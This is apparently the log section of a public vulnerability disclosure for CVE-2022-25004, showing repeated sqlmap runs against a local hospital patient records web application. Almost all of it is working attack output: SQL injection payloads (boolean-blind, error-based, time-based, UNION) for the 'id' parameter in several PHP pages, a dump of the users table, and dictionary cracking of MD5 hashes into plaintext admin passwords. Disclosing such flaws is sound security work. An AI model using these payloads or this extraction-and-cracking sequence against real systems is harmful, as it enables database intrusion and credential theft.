[12:03:06] [INFO] testing if the target URL content is stable
[12:03:07] [INFO] target URL content is stable
[12:03:07] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[12:03:07] [INFO] testing for SQL injection on GET parameter 'id'
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[12:03:07] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:03:07] [WARNING] reflective value(s) found and filtering out
[12:03:07] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Over There Street, Here City, Anywhere, 2306")
[12:03:07] [INFO] testing 'Generic inline queries'
[12:03:07] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[12:03:07] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[12:03:07] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[12:03:07] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[12:03:07] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[12:03:07] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[12:03:08] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[12:03:08] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[12:03:08] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[12:03:08] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[12:03:08] [INFO] testing 'MySQL inline queries'
[12:03:08] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[12:03:08] [WARNING] time-based comparison requires larger statistical model, please wait...... (done)
[12:03:08] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[12:03:08] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[12:03:08] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[12:03:08] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[12:03:08] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[12:03:08] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[12:03:14] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[12:03:14] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[12:03:14] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[12:03:14] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[12:03:14] [INFO] target URL appears to have 7 columns in query
[12:03:15] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 64 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 5342=5342 AND 'TSQh'='TSQh
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 4644 FROM(SELECT COUNT(*),CONCAT(0x7162626b71,(SELECT (ELT(4644=4644,1))),0x71626a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'TAyy'='TAyy
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 2728 FROM (SELECT(SLEEP(3)))orQs) AND 'lADO'='lADO
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: id=-6378' UNION ALL SELECT CONCAT(0x7162626b71,0x534e7a6c74596e766e426e5667486f7661586c6b445a556f485551486a547562436345664f585462,0x71626a6a71),NULL,NULL,NULL,NULL,NULL,NULL-- -
---
[12:03:15] [INFO] the back-end DBMS is MySQL
web application technology: PHP 8.1.2, Apache 2.4.52, PHP
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[12:03:15] [INFO] fetching entries of column(s) 'password,username' for table 'users' in database 'hprms_db'
[12:03:15] [INFO] retrieved: '0192023a7bbd73250516f069df18b500','admin'
[12:03:15] [INFO] retrieved: '97a8afcf419cc231e1bdcd8584b0a246','cblake'
[12:03:15] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[12:03:26] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file 'C:\Users\venvaropt\Desktop\CVE\sqlmap\data\txt\wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> Y
[12:03:26] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[12:03:26] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[12:03:26] [INFO] starting 4 processes
[' for user '12:03:32admin] ['O] current status: 1jesu... |] cracked password 'admin123
[12:03:4212:03:42] [] [INFOINFO] current status: P14O1... |] cracked password 'stupid123' for user 'cblake'
Database: hprms_db
Table: users
[2 entries]
+----------+----------------------------------------------+
| username | password |
+----------+----------------------------------------------+
| admin | 0192023a7bbd73250516f069df18b500 (admin123) |
| cblake | 97a8afcf419cc231e1bdcd8584b0a246 (stupid123) |
+----------+----------------------------------------------+
[12:04:04] [INFO] table 'hprms_db.users' dumped to CSV file 'C:\Users\venvaropt\AppData\Local\sqlmap\output\localhost\dump\hprms_db\users.csv'
[12:04:04] [INFO] fetched data logged to text files under 'C:\Users\venvaropt\AppData\Local\sqlmap\output\localhost'
[*] ending @ 12:04:04 /2022-03-01/
SQL - Injecting for parameter 'id' in view_history.php app
,d d ,d d8
888-~88e 888 888 ,d888 ,d888 d88~\ e88~~8e e88~~\ 888 888 888-~\ ,d888 _d88__ Y88b /
888 888 888 888 888 888 C888 d888 88b d888 888 888 888 888 888 Y888/
888 888 888 888 888 888 Y88b 8888__888 8888 888 888 888 888 888 Y8/
888 888 888 888 888 888 888D Y888 , Y888 888 888 888 888 888 Y
888 888 "88_-888 888 888 \_88P "88___/ "88__/ "88_-888 888 888 "88_/ /
_/
{1.6.1.2#dev}
https://sqlmap.org
https://www.nu11secur1ty.com/
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 12:04:09 /2022-03-01/
[12:04:09] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=om5n296h9bj...urhf8qd1t0'). Do you want to use those [Y/n] Y
[12:04:09] [INFO] checking if the target is protected by some kind of WAF/IPS
[12:04:09] [INFO] testing if the target URL content is stable
[12:04:10] [INFO] target URL content is stable
[12:04:10] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[12:04:10] [INFO] testing for SQL injection on GET parameter 'id'
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[12:04:10] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:04:10] [WARNING] reflective value(s) found and filtering out
[12:04:10] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[12:04:10] [INFO] testing 'Generic inline queries'
[12:04:10] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[12:04:12] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[12:04:13] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[12:04:14] [INFO] GET parameter 'id' appears to be 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)' injectable
[12:04:14] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[12:04:14] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[12:04:14] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[12:04:14] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[12:04:14] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[12:04:14] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[12:04:14] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[12:04:14] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[12:04:14] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[12:04:14] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[12:04:14] [INFO] GET parameter 'id' is 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[12:04:14] [INFO] testing 'MySQL inline queries'
[12:04:14] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[12:04:14] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[12:04:14] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[12:04:14] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[12:04:14] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[12:04:14] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[12:04:14] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[12:04:20] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[12:04:20] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[12:04:20] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[12:04:20] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[12:04:21] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[12:04:21] [INFO] target URL appears to have 10 columns in query
[12:04:21] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
[12:04:21] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 154 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
Payload: id=1' OR NOT 2894=2894#
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' OR (SELECT 2823 FROM(SELECT COUNT(*),CONCAT(0x71706b6a71,(SELECT (ELT(2823=2823,1))),0x7170717871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- NtWR
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 2385 FROM (SELECT(SLEEP(3)))Nuwd)-- bAsV
Type: UNION query
Title: MySQL UNION query (NULL) - 10 columns
Payload: id=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71706b6a71,0x54706a5a776b54714371787a617078774f7450657455496f7a614e75547177536961544c74546875,0x7170717871),NULL,NULL,NULL,NULL,NULL,NULL#
---
[12:04:21] [INFO] the back-end DBMS is MySQL
web application technology: PHP, PHP 8.1.2, Apache 2.4.52
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[12:04:21] [INFO] fetching entries of column(s) 'password,username' for table 'users' in database 'hprms_db'
[12:04:21] [INFO] retrieved: '0192023a7bbd73250516f069df18b500','admin'
[12:04:21] [INFO] retrieved: '97a8afcf419cc231e1bdcd8584b0a246','cblake'
[12:04:21] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[12:04:21] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file 'C:\Users\venvaropt\Desktop\CVE\sqlmap\data\txt\wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> Y
[12:04:21] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[12:04:21] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[12:04:21] [INFO] starting 4 processes
[12:04:35cblake12:04:35't status: 09100... |INFO] cracked password 'stupid123
] [] [INFOINFO] current status: 09101... /] cracked password 'admin123' for user 'admin'
Database: hprms_db
Table: users
[2 entries]
+----------+----------------------------------------------+
| username | password |
+----------+----------------------------------------------+
| admin | 0192023a7bbd73250516f069df18b500 (admin123) |
| cblake | 97a8afcf419cc231e1bdcd8584b0a246 (stupid123) |
+----------+----------------------------------------------+
[12:05:01] [INFO] table 'hprms_db.users' dumped to CSV file 'C:\Users\venvaropt\AppData\Local\sqlmap\output\localhost\dump\hprms_db\users.csv'
[12:05:01] [INFO] fetched data logged to text files under 'C:\Users\venvaropt\AppData\Local\sqlmap\output\localhost'
[*] ending @ 12:05:01 /2022-03-01/
SQL - Injecting for parameter 'id' in manage_admission.php app
,d d ,d d8
888-~88e 888 888 ,d888 ,d888 d88~\ e88~~8e e88~~\ 888 888 888-~\ ,d888 _d88__ Y88b /
888 888 888 888 888 888 C888 d888 88b d888 888 888 888 888 888 Y888/
888 888 888 888 888 888 Y88b 8888__888 8888 888 888 888 888 888 Y8/
888 888 888 888 888 888 888D Y888 , Y888 888 888 888 888 888 Y
888 888 "88_-888 888 888 \_88P "88___/ "88__/ "88_-888 888 888 "88_/ /
_/
{1.6.1.2#dev}
https://sqlmap.org
https://www.nu11secur1ty.com/
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 12:05:09 /2022-03-01/
[12:05:09] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=20uv7un8gs4...8s8qj5kopv'). Do you want to use those [Y/n] Y
[12:05:09] [INFO] checking if the target is protected by some kind of WAF/IPS
[12:05:09] [INFO] testing if the target URL content is stable
[12:05:10] [INFO] target URL content is stable
[12:05:10] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[12:05:10] [INFO] testing for SQL injection on GET parameter 'id'
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[12:05:10] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:05:10] [WARNING] reflective value(s) found and filtering out
[12:05:10] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[12:05:10] [INFO] testing 'Generic inline queries'
[12:05:10] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[12:05:12] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[12:05:14] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[12:05:15] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[12:05:16] [INFO] GET parameter 'id' appears to be 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause' injectable (with --not-string="Fatal")
[12:05:16] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[12:05:16] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[12:05:16] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[12:05:16] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[12:05:16] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[12:05:16] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[12:05:16] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[12:05:16] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[12:05:16] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[12:05:16] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[12:05:16] [INFO] GET parameter 'id' is 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[12:05:16] [INFO] testing 'MySQL inline queries'
[12:05:16] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[12:05:16] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[12:05:16] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[12:05:16] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[12:05:16] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[12:05:16] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[12:05:17] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[12:05:23] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[12:05:30] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[12:05:30] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[12:05:30] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[12:05:30] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[12:05:31] [INFO] target URL appears to have 8 columns in query
[12:05:31] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 204 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=1' RLIKE (SELECT (CASE WHEN (1299=1299) THEN 1 ELSE 0x28 END))-- QynS
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' OR (SELECT 7634 FROM(SELECT COUNT(*),CONCAT(0x716b7a6b71,(SELECT (ELT(7634=7634,1))),0x71786a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- vmRW
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 8229 FROM (SELECT(SLEEP(3)))Qpzi)-- hEWR
Type: UNION query
Title: MySQL UNION query (NULL) - 8 columns
Payload: id=1' UNION ALL SELECT CONCAT(0x716b7a6b71,0x446147684b447641734a4e63496e494a4b67784956554b4952515543684251577076656f42487754,0x71786a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL#
---
[12:05:31] [INFO] the back-end DBMS is MySQL
web application technology: PHP 8.1.2, PHP, Apache 2.4.52
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[12:05:31] [INFO] fetching entries of column(s) 'password,username' for table 'users' in database 'hprms_db'
[12:05:31] [INFO] retrieved: '0192023a7bbd73250516f069df18b500','admin'
[12:05:31] [INFO] retrieved: '97a8afcf419cc231e1bdcd8584b0a246','cblake'
[12:05:31] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[12:05:31] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file 'C:\Users\venvaropt\Desktop\CVE\sqlmap\data\txt\wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> Y
[12:05:31] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[12:05:31] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[12:05:31] [INFO] starting 4 processes
[12:05:37] [INFO] cracked password 'admin123' for user 'admin'
[] [12:05:48INFO] [] current status: Upgra... |INFO] cracked password 'stupid123' for user 'cblake'
Database: hprms_db
Table: users
[2 entries]
+----------+----------------------------------------------+
| username | password |
+----------+----------------------------------------------+
| admin | 0192023a7bbd73250516f069df18b500 (admin123) |
| cblake | 97a8afcf419cc231e1bdcd8584b0a246 (stupid123) |
+----------+----------------------------------------------+
[12:06:08] [INFO] table 'hprms_db.users' dumped to CSV file 'C:\Users\venvaropt\AppData\Local\sqlmap\output\localhost\dump\hprms_db\users.csv'
[12:06:08] [INFO] fetched data logged to text files under 'C:\Users\venvaropt\AppData\Local\sqlmap\output\localhost'
[*] ending @ 12:06:08 /2022-03-01/
SQL - Injecting for parameter 'id' in manage_room_type.php app
,d d ,d d8
888-~88e 888 888 ,d888 ,d888 d88~\ e88~~8e e88~~\ 888 888 888-~\ ,d888 _d88__ Y88b /
888 888 888 888 888 888 C888 d888 88b d888 888 888 888 888 888 Y888/
888 888 888 888 888 888 Y88b 8888__888 8888 888 888 888 888 888 Y8/
888 888 888 888 888 888 888D Y888 , Y888 888 888 888 888 888 Y
888 888 "88_-888 888 888 \_88P "88___/ "88__/ "88_-888 888 888 "88_/ /
_/
{1.6.1.2#dev}
https://sqlmap.org
https://www.nu11secur1ty.com/
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 12:06:15 /2022-03-01/
[12:06:15] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=5u1m2tvs8rd...mm5ijndlgg'). Do you want to use those [Y/n] Y
[12:06:15] [INFO] checking if the target is protected by some kind of WAF/IPS
[12:06:15] [INFO] testing if the target URL content is stable
[12:06:16] [INFO] target URL content is stable
[12:06:16] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[12:06:16] [INFO] testing for SQL injection on GET parameter 'id'
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[12:06:16] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:06:16] [WARNING] reflective value(s) found and filtering out
[12:06:16] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Private Room with Single Patient Bed.")
[12:06:16] [INFO] testing 'Generic inline queries'
[12:06:16] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[12:06:16] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[12:06:16] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[12:06:16] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[12:06:16] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[12:06:16] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[12:06:16] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[12:06:16] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[12:06:16] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[12:06:17] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[12:06:17] [INFO] testing 'MySQL inline queries'
[12:06:17] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[12:06:17] [WARNING] time-based comparison requires larger statistical model, please wait...... (done)
[12:06:17] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[12:06:17] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[12:06:17] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[12:06:17] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[12:06:17] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[12:06:17] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[12:06:23] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[12:06:23] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[12:06:23] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[12:06:23] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[12:06:23] [INFO] target URL appears to have 6 columns in query
[12:06:24] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 57 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 4275=4275 AND 'Pbap'='Pbap
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 7905 FROM(SELECT COUNT(*),CONCAT(0x71626a6b71,(SELECT (ELT(7905=7905,1))),0x716b717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'AwDy'='AwDy
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 1604 FROM (SELECT(SLEEP(3)))MPcP) AND 'bAKs'='bAKs
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: id=-6478' UNION ALL SELECT CONCAT(0x71626a6b71,0x616d625874694476617a78684a536b747145584d54786b47637545457570594e6e5766734f587249,0x716b717171),NULL,NULL,NULL,NULL,NULL-- -
---
[12:06:24] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.52, PHP, PHP 8.1.2
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[12:06:24] [INFO] fetching entries of column(s) 'password,username' for table 'users' in database 'hprms_db'
[12:06:24] [INFO] retrieved: '0192023a7bbd73250516f069df18b500','admin'
[12:06:24] [INFO] retrieved: '97a8afcf419cc231e1bdcd8584b0a246','cblake'
[12:06:24] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[12:06:24] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file 'C:\Users\venvaropt\Desktop\CVE\sqlmap\data\txt\wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> Y
[12:06:24] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[12:06:24] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[12:06:24] [INFO] starting 4 processes
[] cracked password '12:06:30admin123] [' for user 'INFO] current status: 1teli... |admin'
[cblake12:06:40's: a9243... /12:06:40] [INFO] cracked password 'stupid123' for user '
Database: hprms_db
Table: users
[2 entries]
+----------+----------------------------------------------+
| username | password |
+----------+----------------------------------------------+
| admin | 0192023a7bbd73250516f069df18b500 (admin123) |
| cblake | 97a8afcf419cc231e1bdcd8584b0a246 (stupid123) |
+----------+----------------------------------------------+
[12:07:03] [INFO] table 'hprms_db.users' dumped to CSV file 'C:\Users\venvaropt\AppData\Local\sqlmap\output\localhost\dump\hprms_db\users.csv'
[12:07:03] [INFO] fetched data logged to text files under 'C:\Users\venvaropt\AppData\Local\sqlmap\output\localhost'
[*] ending @ 12:07:03 /2022-03-01/
Happy hunting with nu11secur1ty =)
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2022/CVE-2022-25004)
## More info:
[href](https://www.nu11secur1ty.com/2022/03/cve-2022-25004.html)
|
# How-to Tutorials
